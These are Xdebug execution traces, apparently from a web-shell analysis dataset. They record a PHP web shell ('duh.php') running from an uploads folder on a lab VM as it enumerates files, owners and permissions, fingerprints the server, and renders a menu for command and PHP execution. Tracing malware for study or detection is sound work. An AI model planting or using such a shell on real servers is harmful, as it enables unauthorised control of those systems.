3 118 0 0.005196 495736 sprintf 0 /var/www/html/uploads/duh.Php5 57 2 '%o' 16895
3 118 1 0.005208 496120
3 118 R '40777'
3 119 0 0.005222 496056 substr 0 /var/www/html/uploads/duh.Php5 57 2 '40777' -4
3 119 1 0.005234 496152
3 119 R '0777'
2 115 1 0.005247 495768
2 115 R '0777'
1 A /var/www/html/uploads/duh.Php5 41 $i++
2 120 0 0.005271 494456 function_exists 0 /var/www/html/uploads/duh.Php5 41 1 'posix_getpwuid'
2 120 1 0.005285 494496
2 120 R TRUE
2 121 0 0.005297 494456 function_exists 0 /var/www/html/uploads/duh.Php5 41 1 'posix_getgrgid'
2 121 1 0.005310 494496
2 121 R TRUE
2 122 0 0.005322 494456 fileowner 0 /var/www/html/uploads/duh.Php5 41 1 'data'
2 122 1 0.005337 494496
2 122 R 0
2 123 0 0.005349 494456 posix_getpwuid 0 /var/www/html/uploads/duh.Php5 41 1 0
2 123 1 0.005374 495256
2 123 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php5 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 124 0 0.005420 494456 filegroup 0 /var/www/html/uploads/duh.Php5 41 1 'data'
2 124 1 0.005433 494496
2 124 R 0
2 125 0 0.005446 494456 posix_getgrgid 0 /var/www/html/uploads/duh.Php5 41 1 0
2 125 1 0.005467 495112
2 125 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.Php5 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 126 0 0.005501 494536 realpath 0 /var/www/html/uploads/duh.Php5 41 1 'data'
2 126 1 0.005517 494624
2 126 R '/var/www/html/uploads/data'
2 127 0 0.005533 494648 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '.'
2 127 1 0.005546 494728
2 127 R '/var/www/html/uploads'
2 128 0 0.005560 494712 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '.'
2 128 1 0.005573 494792
2 128 R '/var/www/html/uploads'
2 129 0 0.005587 495096 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '.'
2 129 1 0.005600 495176
2 129 R '/var/www/html/uploads'
2 130 0 0.005613 495096 realpath 0 /var/www/html/uploads/duh.Php5 41 1 'data'
2 130 1 0.005626 495184
2 130 R '/var/www/html/uploads/data'
2 131 0 0.005641 495480 get_color 1 /var/www/html/uploads/duh.Php5 41 1 'data'
3 132 0 0.005654 495480 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 'data'
3 132 1 0.005668 495520
3 132 R TRUE
2 A /var/www/html/uploads/duh.Php5 56 $c = '#ccff00'
3 133 0 0.005691 495480 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 'data'
3 133 1 0.005705 495520
3 133 R TRUE
3 134 0 0.005719 495480 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 'data'
3 134 1 0.005732 495520
3 134 R TRUE
2 131 1 0.005745 495480
2 131 R '#ccff00'
2 135 0 0.005758 495480 perms 1 /var/www/html/uploads/duh.Php5 41 1 'data'
3 136 0 0.005770 495480 file_exists 0 /var/www/html/uploads/duh.Php5 57 1 'data'
3 136 1 0.005784 495520
3 136 R TRUE
3 137 0 0.005797 495480 fileperms 0 /var/www/html/uploads/duh.Php5 57 1 'data'
3 137 1 0.005809 495520
3 137 R 16895
3 138 0 0.005822 495480 sprintf 0 /var/www/html/uploads/duh.Php5 57 2 '%o' 16895
3 138 1 0.005835 495864
3 138 R '40777'
3 139 0 0.005847 495800 substr 0 /var/www/html/uploads/duh.Php5 57 2 '40777' -4
3 139 1 0.005860 495896
3 139 R '0777'
2 135 1 0.005873 495512
2 135 R '0777'
2 140 0 0.005886 495480 realpath 0 /var/www/html/uploads/duh.Php5 41 1 '.'
2 140 1 0.005899 495560
2 140 R '/var/www/html/uploads'
2 141 0 0.005913 495736 realpath 0 /var/www/html/uploads/duh.Php5 41 1 'data'
2 141 1 0.005926 495824
2 141 R '/var/www/html/uploads/data'
2 142 0 0.005940 495736 perms 1 /var/www/html/uploads/duh.Php5 41 1 'data'
3 143 0 0.005952 495736 file_exists 0 /var/www/html/uploads/duh.Php5 57 1 'data'
3 143 1 0.005966 495776
3 143 R TRUE
3 144 0 0.005978 495736 fileperms 0 /var/www/html/uploads/duh.Php5 57 1 'data'
3 144 1 0.005990 495776
3 144 R 16895
3 145 0 0.006003 495736 sprintf 0 /var/www/html/uploads/duh.Php5 57 2 '%o' 16895
3 145 1 0.006015 496120
3 145 R '40777'
3 146 0 0.006028 496056 substr 0 /var/www/html/uploads/duh.Php5 57 2 '40777' -4
3 146 1 0.006040 496152
3 146 R '0777'
2 142 1 0.006053 495768
2 142 R '0777'
1 A /var/www/html/uploads/duh.Php5 41 $i++
2 147 0 0.006177 494456 function_exists 0 /var/www/html/uploads/duh.Php5 42 1 'posix_getpwuid'
2 147 1 0.006191 494496
2 147 R TRUE
2 148 0 0.006203 494456 function_exists 0 /var/www/html/uploads/duh.Php5 42 1 'posix_getgrgid'
2 148 1 0.006217 494496
2 148 R TRUE
2 149 0 0.006229 494456 fileowner 0 /var/www/html/uploads/duh.Php5 42 1 '.htaccess'
2 149 1 0.006244 494504
2 149 R 0
2 150 0 0.006257 494464 posix_getpwuid 0 /var/www/html/uploads/duh.Php5 42 1 0
2 150 1 0.006279 495264
2 150 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php5 42 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 151 0 0.006324 494464 filegroup 0 /var/www/html/uploads/duh.Php5 42 1 '.htaccess'
2 151 1 0.006337 494504
2 151 R 0
2 152 0 0.006349 494464 posix_getgrgid 0 /var/www/html/uploads/duh.Php5 42 1 0
2 152 1 0.006383 495120
2 152 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.Php5 42 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 153 0 0.006418 494544 realpath 0 /var/www/html/uploads/duh.Php5 42 1 '.'
2 153 1 0.006432 494624
2 153 R '/var/www/html/uploads'
2 154 0 0.006448 494656 realpath 0 /var/www/html/uploads/duh.Php5 42 1 '.'
2 154 1 0.006461 494736
2 154 R '/var/www/html/uploads'
2 155 0 0.006474 494720 realpath 0 /var/www/html/uploads/duh.Php5 42 1 '.'
2 155 1 0.006486 494800
2 155 R '/var/www/html/uploads'
2 156 0 0.006501 495104 realpath 0 /var/www/html/uploads/duh.Php5 42 1 '.'
2 156 1 0.006514 495184
2 156 R '/var/www/html/uploads'
2 157 0 0.006528 495232 realpath 0 /var/www/html/uploads/duh.Php5 42 1 '.htaccess'
2 157 1 0.006543 495320
2 157 R '/var/www/html/uploads/.htaccess'
2 158 0 0.006559 495488 get_color 1 /var/www/html/uploads/duh.Php5 42 1 '.htaccess'
3 159 0 0.006572 495488 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 '.htaccess'
3 159 1 0.006587 495528
3 159 R FALSE
3 160 0 0.006600 495488 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 '.htaccess'
3 160 1 0.006615 495528
3 160 R FALSE
3 161 0 0.006628 495488 is_readable 0 /var/www/html/uploads/duh.Php5 56 1 '.htaccess'
3 161 1 0.006642 495528
3 161 R TRUE
2 A /var/www/html/uploads/duh.Php5 56 $c = ''
3 162 0 0.006667 495488 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 '.htaccess'
3 162 1 0.006682 495528
3 162 R FALSE
3 163 0 0.006694 495488 is_readable 0 /var/www/html/uploads/duh.Php5 56 1 '.htaccess'
3 163 1 0.006708 495528
3 163 R TRUE
2 158 1 0.006721 495488
2 158 R ''
2 164 0 0.006734 495488 perms 1 /var/www/html/uploads/duh.Php5 42 1 '.htaccess'
3 165 0 0.006746 495488 file_exists 0 /var/www/html/uploads/duh.Php5 57 1 '.htaccess'
3 165 1 0.006760 495528
3 165 R TRUE
3 166 0 0.006773 495488 fileperms 0 /var/www/html/uploads/duh.Php5 57 1 '.htaccess'
3 166 1 0.006786 495528
3 166 R 33188
3 167 0 0.006798 495488 sprintf 0 /var/www/html/uploads/duh.Php5 57 2 '%o' 33188
3 167 1 0.006811 495872
3 167 R '100644'
3 168 0 0.006824 495808 substr 0 /var/www/html/uploads/duh.Php5 57 2 '100644' -4
3 168 1 0.006837 495904
3 168 R '0644'
2 164 1 0.006850 495520
2 164 R '0644'
2 169 0 0.006863 495744 realpath 0 /var/www/html/uploads/duh.Php5 42 1 '.'
2 169 1 0.006876 495824
2 169 R '/var/www/html/uploads'
2 170 0 0.006890 495744 realpath 0 /var/www/html/uploads/duh.Php5 42 1 '.htaccess'
2 170 1 0.006904 495832
2 170 R '/var/www/html/uploads/.htaccess'
2 171 0 0.006919 495744 perms 1 /var/www/html/uploads/duh.Php5 42 1 '.htaccess'
3 172 0 0.006931 495744 file_exists 0 /var/www/html/uploads/duh.Php5 57 1 '.htaccess'
3 172 1 0.006945 495784
3 172 R TRUE
3 173 0 0.006958 495744 fileperms 0 /var/www/html/uploads/duh.Php5 57 1 '.htaccess'
3 173 1 0.006970 495784
3 173 R 33188
3 174 0 0.006982 495744 sprintf 0 /var/www/html/uploads/duh.Php5 57 2 '%o' 33188
3 174 1 0.006995 496128
3 174 R '100644'
3 175 0 0.007008 496064 substr 0 /var/www/html/uploads/duh.Php5 57 2 '100644' -4
3 175 1 0.007020 496160
3 175 R '0644'
2 171 1 0.007033 495776
2 171 R '0644'
2 176 0 0.007047 494464 function_exists 0 /var/www/html/uploads/duh.Php5 42 1 'posix_getpwuid'
2 176 1 0.007061 494504
2 176 R TRUE
2 177 0 0.007073 494464 function_exists 0 /var/www/html/uploads/duh.Php5 42 1 'posix_getgrgid'
2 177 1 0.007091 494504
2 177 R TRUE
2 178 0 0.007104 494464 fileowner 0 /var/www/html/uploads/duh.Php5 42 1 'duh.Php5'
2 178 1 0.007118 494504
2 178 R 1000
2 179 0 0.007130 494464 posix_getpwuid 0 /var/www/html/uploads/duh.Php5 42 1 1000
2 179 1 0.007160 495280
2 179 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php5 42 $own = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2 180 0 0.007204 494480 filegroup 0 /var/www/html/uploads/duh.Php5 42 1 'duh.Php5'
2 180 1 0.007216 494520
2 180 R 1000
2 181 0 0.007229 494480 posix_getgrgid 0 /var/www/html/uploads/duh.Php5 42 1 1000
2 181 1 0.007260 495136
2 181 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
1 A /var/www/html/uploads/duh.Php5 42 $grp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2 182 0 0.007294 494560 realpath 0 /var/www/html/uploads/duh.Php5 42 1 '.'
2 182 1 0.007308 494640
2 182 R '/var/www/html/uploads'
2 183 0 0.007323 494672 realpath 0 /var/www/html/uploads/duh.Php5 42 1 '.'
2 183 1 0.007336 494752
2 183 R '/var/www/html/uploads'
2 184 0 0.007351 494736 realpath 0 /var/www/html/uploads/duh.Php5 42 1 '.'
2 184 1 0.007363 494816
2 184 R '/var/www/html/uploads'
2 185 0 0.007378 495120 realpath 0 /var/www/html/uploads/duh.Php5 42 1 '.'
2 185 1 0.007390 495200
2 185 R '/var/www/html/uploads'
2 186 0 0.007405 495248 realpath 0 /var/www/html/uploads/duh.Php5 42 1 'duh.Php5'
2 186 1 0.007418 495336
2 186 R '/var/www/html/uploads/duh.Php5'
2 187 0 0.007434 495504 get_color 1 /var/www/html/uploads/duh.Php5 42 1 'duh.Php5'
3 188 0 0.007446 495504 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 'duh.Php5'
3 188 1 0.007460 495544
3 188 R FALSE
3 189 0 0.007473 495504 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 'duh.Php5'
3 189 1 0.007487 495544
3 189 R FALSE
3 190 0 0.007500 495504 is_readable 0 /var/www/html/uploads/duh.Php5 56 1 'duh.Php5'
3 190 1 0.007513 495544
3 190 R TRUE
2 A /var/www/html/uploads/duh.Php5 56 $c = ''
3 191 0 0.007537 495504 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 'duh.Php5'
3 191 1 0.007550 495544
3 191 R FALSE
3 192 0 0.007563 495504 is_readable 0 /var/www/html/uploads/duh.Php5 56 1 'duh.Php5'
3 192 1 0.007575 495544
3 192 R TRUE
2 187 1 0.007588 495504
2 187 R ''
2 193 0 0.007601 495504 perms 1 /var/www/html/uploads/duh.Php5 42 1 'duh.Php5'
3 194 0 0.007612 495504 file_exists 0 /var/www/html/uploads/duh.Php5 57 1 'duh.Php5'
3 194 1 0.007625 495544
3 194 R TRUE
3 195 0 0.007638 495504 fileperms 0 /var/www/html/uploads/duh.Php5 57 1 'duh.Php5'
3 195 1 0.007649 495544
3 195 R 33204
3 196 0 0.007662 495504 sprintf 0 /var/www/html/uploads/duh.Php5 57 2 '%o' 33204
3 196 1 0.007675 495888
3 196 R '100664'
3 197 0 0.007688 495824 substr 0 /var/www/html/uploads/duh.Php5 57 2 '100664' -4
3 197 1 0.007701 495920
3 197 R '0664'
2 193 1 0.007714 495536
2 193 R '0664'
2 198 0 0.007727 495760 realpath 0 /var/www/html/uploads/duh.Php5 42 1 '.'
2 198 1 0.007740 495840
2 198 R '/var/www/html/uploads'
2 199 0 0.007755 495760 realpath 0 /var/www/html/uploads/duh.Php5 42 1 'duh.Php5'
2 199 1 0.007767 495848
2 199 R '/var/www/html/uploads/duh.Php5'
2 200 0 0.007782 495760 perms 1 /var/www/html/uploads/duh.Php5 42 1 'duh.Php5'
3 201 0 0.007794 495760 file_exists 0 /var/www/html/uploads/duh.Php5 57 1 'duh.Php5'
3 201 1 0.007807 495800
3 201 R TRUE
3 202 0 0.007820 495760 fileperms 0 /var/www/html/uploads/duh.Php5 57 1 'duh.Php5'
3 202 1 0.007831 495800
3 202 R 33204
3 203 0 0.007843 495760 sprintf 0 /var/www/html/uploads/duh.Php5 57 2 '%o' 33204
3 203 1 0.007856 496144
3 203 R '100664'
3 204 0 0.007884 496080 substr 0 /var/www/html/uploads/duh.Php5 57 2 '100664' -4
3 204 1 0.007897 496176
3 204 R '0664'
2 200 1 0.007910 495792
2 200 R '0664'
2 205 0 0.007924 494480 function_exists 0 /var/www/html/uploads/duh.Php5 42 1 'posix_getpwuid'
2 205 1 0.007938 494520
2 205 R TRUE
2 206 0 0.007950 494480 function_exists 0 /var/www/html/uploads/duh.Php5 42 1 'posix_getgrgid'
2 206 1 0.007963 494520
2 206 R TRUE
2 207 0 0.007975 494480 fileowner 0 /var/www/html/uploads/duh.Php5 42 1 'prepend.php'
2 207 1 0.007990 494520
2 207 R 0
2 208 0 0.008002 494480 posix_getpwuid 0 /var/www/html/uploads/duh.Php5 42 1 0
2 208 1 0.008024 495280
2 208 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php5 42 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 209 0 0.008064 494464 filegroup 0 /var/www/html/uploads/duh.Php5 42 1 'prepend.php'
2 209 1 0.008078 494504
2 209 R 0
2 210 0 0.008090 494464 posix_getgrgid 0 /var/www/html/uploads/duh.Php5 42 1 0
2 210 1 0.008111 495120
2 210 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.Php5 42 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 211 0 0.008145 494544 realpath 0 /var/www/html/uploads/duh.Php5 42 1 '.'
2 211 1 0.008158 494624
2 211 R '/var/www/html/uploads'
2 212 0 0.008173 494688 realpath 0 /var/www/html/uploads/duh.Php5 42 1 '.'
2 212 1 0.008186 494768
2 212 R '/var/www/html/uploads'
2 213 0 0.008200 494784 realpath 0 /var/www/html/uploads/duh.Php5 42 1 '.'
2 213 1 0.008213 494864
2 213 R '/var/www/html/uploads'
2 214 0 0.008228 495104 realpath 0 /var/www/html/uploads/duh.Php5 42 1 '.'
2 214 1 0.008240 495184
2 214 R '/var/www/html/uploads'
2 215 0 0.008254 495232 realpath 0 /var/www/html/uploads/duh.Php5 42 1 'prepend.php'
2 215 1 0.008267 495328
2 215 R '/var/www/html/uploads/prepend.php'
2 216 0 0.008283 495488 get_color 1 /var/www/html/uploads/duh.Php5 42 1 'prepend.php'
3 217 0 0.008295 495488 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 'prepend.php'
3 217 1 0.008310 495528
3 217 R FALSE
3 218 0 0.008324 495488 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 'prepend.php'
3 218 1 0.008338 495528
3 218 R FALSE
3 219 0 0.008350 495488 is_readable 0 /var/www/html/uploads/duh.Php5 56 1 'prepend.php'
3 219 1 0.008364 495528
3 219 R TRUE
2 A /var/www/html/uploads/duh.Php5 56 $c = ''
3 220 0 0.008388 495488 is_writable 0 /var/www/html/uploads/duh.Php5 56 1 'prepend.php'
3 220 1 0.008402 495528
3 220 R FALSE
3 221 0 0.008415 495488 is_readable 0 /var/www/html/uploads/duh.Php5 56 1 'prepend.php'
3 221 1 0.008429 495528
3 221 R TRUE
2 216 1 0.008442 495488
2 216 R ''
2 222 0 0.008454 495488 perms 1 /var/www/html/uploads/duh.Php5 42 1 'prepend.php'
3 223 0 0.008466 495488 file_exists 0 /var/www/html/uploads/duh.Php5 57 1 'prepend.php'
3 223 1 0.008480 495528
3 223 R TRUE
3 224 0 0.008492 495488 fileperms 0 /var/www/html/uploads/duh.Php5 57 1 'prepend.php'
3 224 1 0.008505 495528
3 224 R 33261
3 225 0 0.008517 495488 sprintf 0 /var/www/html/uploads/duh.Php5 57 2 '%o' 33261
3 225 1 0.008530 495872
3 225 R '100755'
3 226 0 0.008543 495808 substr 0 /var/www/html/uploads/duh.Php5 57 2 '100755' -4
3 226 1 0.008555 495904
3 226 R '0755'
2 222 1 0.008568 495520
2 222 R '0755'
2 227 0 0.008581 495744 realpath 0 /var/www/html/uploads/duh.Php5 42 1 '.'
2 227 1 0.008594 495824
2 227 R '/var/www/html/uploads'
2 228 0 0.008620 495744 realpath 0 /var/www/html/uploads/duh.Php5 42 1 'prepend.php'
2 228 1 0.008635 495840
2 228 R '/var/www/html/uploads/prepend.php'
2 229 0 0.008650 495744 perms 1 /var/www/html/uploads/duh.Php5 42 1 'prepend.php'
3 230 0 0.008666 495744 file_exists 0 /var/www/html/uploads/duh.Php5 57 1 'prepend.php'
3 230 1 0.008682 495784
3 230 R TRUE
3 231 0 0.008695 495744 fileperms 0 /var/www/html/uploads/duh.Php5 57 1 'prepend.php'
3 231 1 0.008707 495784
3 231 R 33261
3 232 0 0.008720 495744 sprintf 0 /var/www/html/uploads/duh.Php5 57 2 '%o' 33261
3 232 1 0.008732 496128
3 232 R '100755'
3 233 0 0.008745 496064 substr 0 /var/www/html/uploads/duh.Php5 57 2 '100755' -4
3 233 1 0.008758 496160
3 233 R '0755'
2 229 1 0.008771 495776
2 229 R '0755'
1 3 1 0.008789 494464
0.008829 347184
TRACE END [2023-02-12 21:03:19.787968]
data/traces/d1f9301980fe3353e9ad011975f546ec_trace-1676252108.4736.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:35:34.371404]
1 0 1 0.000151 393512
1 3 0 0.000712 487616 {main} 1 /var/www/html/uploads/duh.php 0 0
2 4 0 0.000734 487616 error_reporting 0 /var/www/html/uploads/duh.php 2 1 0
2 4 1 0.000749 487656
2 4 R 22527
1 A /var/www/html/uploads/duh.php 3 $xyn = 'tunafeesh'
2 5 0 0.000782 487616 basename 0 /var/www/html/uploads/duh.php 6 1 '/var/www/html/uploads/duh.php'
2 5 1 0.000798 487680
2 5 R 'duh.php'
1 A /var/www/html/uploads/duh.php 6 $me = 'duh.php'
1 A /var/www/html/uploads/duh.php 6 $server_soft = 'Apache/2.4.52 (Ubuntu)'
2 6 0 0.000835 487648 php_uname 0 /var/www/html/uploads/duh.php 6 0
2 6 1 0.000849 487760
2 6 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 A /var/www/html/uploads/duh.php 6 $uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 7 0 0.000883 487760 get_current_user 0 /var/www/html/uploads/duh.php 6 0
2 7 1 0.000923 487800
2 7 R 'osboxes'
2 8 0 0.000939 487808 getmyuid 0 /var/www/html/uploads/duh.php 6 0
2 8 1 0.000951 487808
2 8 R 1000
2 9 0 0.000964 487816 getmygid 0 /var/www/html/uploads/duh.php 6 0
2 9 1 0.000976 487816
2 9 R 1000
1 A /var/www/html/uploads/duh.php 6 $cur_user = 'osboxes uid:1000 gid:1000'
2 10 0 0.001000 487824 ini_get 0 /var/www/html/uploads/duh.php 6 1 'safe_mode'
2 10 1 0.001013 487856
2 10 R FALSE
1 A /var/www/html/uploads/duh.php 6 $safe_mode = FALSE
1 A /var/www/html/uploads/duh.php 6 $safe_mode = '<font color=#ccff00>OFF</font>'
2 11 0 0.001049 487824 getcwd 0 /var/www/html/uploads/duh.php 6 0
2 11 1 0.001062 487872
2 11 R '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.php 6 $cwd = '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.php 6 $bckC = '#333333'
1 A /var/www/html/uploads/duh.php 6 $txtC = '#999999'
2 12 0 0.001107 487872 getenv 0 /var/www/html/uploads/duh.php 7 1 'HTTP_HOST'
2 12 1 0.001120 487944
2 12 R 'localhost'
1 A /var/www/html/uploads/duh.php 7 $start = '<html><head><title>localhost </title><style>body {background:#333333;color:#999999;font-size:9pt;font-family:Trebuchet MS,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:#999999;text-decoration:none;font-family:Comic Sans Ms,cursive,sans serif;}a:hover {color:#79a317;}hr {background:#999999;color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-'
2 13 0 0.001163 490032 realpath 0 /var/www/html/uploads/duh.php 8 1 '.'
2 13 1 0.001177 490112
2 13 R '/var/www/html/uploads'
2 14 0 0.001192 490112 realpath 0 /var/www/html/uploads/duh.php 8 1 '.'
2 14 1 0.001205 490192
2 14 R '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.php 8 $menu = '<center><p id="menu"><span id="menuB"><<a href="duh.php">Home</a>> <<a href="?x=cmd&d="/var/www/html/uploads">Command</a>> <<a href="?x=php&d="/var/www/html/uploads">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>'
1 A /var/www/html/uploads/duh.php 8 $end = '</body></html>'
1 A /var/www/html/uploads/duh.php 8 $inf = '<center><p id="inf">||| <b><i><u>Software:</u></i></b> Apache/2.4.52 (Ubuntu) ||| <b><i><u>Uname:</u></i></b> Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 |||</br>||| <b><i><u>User:</u></i></b> osboxes uid:1000 gid:1000 ||| <b><i><u>Safe Mode:</u></i></b> <font color=#ccff00>OFF</font> ||| <b><i><u>Directory: </i></b></u>/var/www/html/uploads |||</p></center><hr>'
2 15 0 0.001274 490688 phpversion 0 /var/www/html/uploads/duh.php 10 0
2 15 1 0.001286 490752
2 15 R '7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2 16 0 0.001302 491448 zend_version 0 /var/www/html/uploads/duh.php 10 0
2 16 1 0.001314 491480
2 16 R '3.2.0'
2 17 0 0.001328 491480 magic_quotes 1 /var/www/html/uploads/duh.php 10 0
3 18 0 0.001340 491480 get_magic_quotes_gpc 0 /var/www/html/uploads/duh.php 46 0
3 18 1 0.001352 491480
3 18 R FALSE
2 A /var/www/html/uploads/duh.php 46 $x = FALSE
2 A /var/www/html/uploads/duh.php 46 $m = '<font color=#ccff00>OFF</font>'
2 17 1 0.001387 491480
2 17 R '<font color=#ccff00>OFF</font>'
2 19 0 0.001402 491480 curl 1 /var/www/html/uploads/duh.php 10 0
3 20 0 0.001413 491480 extension_loaded 0 /var/www/html/uploads/duh.php 47 1 'curl'
3 20 1 0.001436 491520
3 20 R TRUE
2 A /var/www/html/uploads/duh.php 47 $c = '<font color=crimson>ON</font>'
2 19 1 0.001461 491480
2 19 R '<font color=crimson>ON</font>'
2 21 0 0.001477 491480 reg_globals 1 /var/www/html/uploads/duh.php 10 0
3 22 0 0.001488 491480 ini_get 0 /var/www/html/uploads/duh.php 48 1 'reqister_globals'
3 22 1 0.001501 491512
3 22 R FALSE
2 A /var/www/html/uploads/duh.php 48 $r = '<font color=#ccff00>OFF</font>'
2 21 1 0.001525 491480
2 21 R '<font color=#ccff00>OFF</font>'
2 23 0 0.001540 491480 openbase_dir 1 /var/www/html/uploads/duh.php 10 0
3 24 0 0.001551 491480 ini_get 0 /var/www/html/uploads/duh.php 45 1 'open_basedir'
3 24 1 0.001564 491512
3 24 R ''
2 A /var/www/html/uploads/duh.php 45 $x = ''
2 A /var/www/html/uploads/duh.php 45 $o = '<font color=#ccff00>OFF</font>'
2 23 1 0.001597 491480
2 23 R '<font color=#ccff00>OFF</font>'
2 25 0 0.001612 491480 myql 1 /var/www/html/uploads/duh.php 10 0
3 26 0 0.001624 491480 function_exists 0 /var/www/html/uploads/duh.php 51 1 'mysql_connect'
3 26 1 0.001637 491520
3 26 R FALSE
2 A /var/www/html/uploads/duh.php 51 $m = '<font color=#ccff00>OFF</font>'
2 25 1 0.001661 491480
2 25 R '<font color=#ccff00>OFF</font>'
2 27 0 0.001675 491480 gzip 1 /var/www/html/uploads/duh.php 10 0
3 28 0 0.001686 491480 function_exists 0 /var/www/html/uploads/duh.php 53 1 'gzencode'
3 28 1 0.001699 491520
3 28 R TRUE
2 A /var/www/html/uploads/duh.php 53 $m = '<font color=crimson>ON</font>'
2 27 1 0.001723 491480
2 27 R '<font color=crimson>ON</font>'
2 29 0 0.001738 491480 mssql 1 /var/www/html/uploads/duh.php 10 0
3 30 0 0.001749 491480 function_exists 0 /var/www/html/uploads/duh.php 52 1 'mssql_connect'
3 30 1 0.001762 491520
3 30 R FALSE
2 A /var/www/html/uploads/duh.php 52 $m = '<font color=#ccff00>OFF</font>'
2 29 1 0.001786 491480
2 29 R '<font color=#ccff00>OFF</font>'
2 31 0 0.001801 491480 postgresql 1 /var/www/html/uploads/duh.php 10 0
3 32 0 0.001812 491480 function_exists 0 /var/www/html/uploads/duh.php 50 1 'pg_connect'
3 32 1 0.001825 491520
3 32 R FALSE
2 A /var/www/html/uploads/duh.php 50 $p = '<font color=#ccff00>OFF</font>'
2 31 1 0.001848 491480
2 31 R '<font color=#ccff00>OFF</font>'
2 33 0 0.001863 491480 oracle 1 /var/www/html/uploads/duh.php 10 0
3 34 0 0.001874 491480 function_exists 0 /var/www/html/uploads/duh.php 49 1 'ocilogon'
3 34 1 0.001886 491520
3 34 R FALSE
2 A /var/www/html/uploads/duh.php 49 $o = '<font color=#ccff00>OFF</font>'
2 33 1 0.001910 491480
2 33 R '<font color=#ccff00>OFF</font>'
2 35 0 0.001926 491480 disk_total_space 0 /var/www/html/uploads/duh.php 10 1 '/'
2 35 1 0.001943 491512
2 35 R 232015802368
2 36 0 0.001957 491480 h_size 1 /var/www/html/uploads/duh.php 10 1 232015802368
3 37 0 0.001972 491480 round 0 /var/www/html/uploads/duh.php 54 1 21608.155441284
3 37 1 0.001985 491512
3 37 R 21608
2 A /var/www/html/uploads/duh.php 54 $s = '216.08GB'
2 36 1 0.002011 491520
2 36 R '216.08GB'
2 38 0 0.002025 491520 disk_free_space 0 /var/www/html/uploads/duh.php 10 1 '/'
2 38 1 0.002040 491552
2 38 R 200538427392
2 39 0 0.002053 491520 h_size 1 /var/www/html/uploads/duh.php 10 1 200538427392
3 40 0 0.002066 491520 round 0 /var/www/html/uploads/duh.php 54 1 18676.596450806
3 40 1 0.002078 491552
3 40 R 18677
2 A /var/www/html/uploads/duh.php 54 $s = '186.77GB'
2 39 1 0.002102 491560
2 39 R '186.77GB'
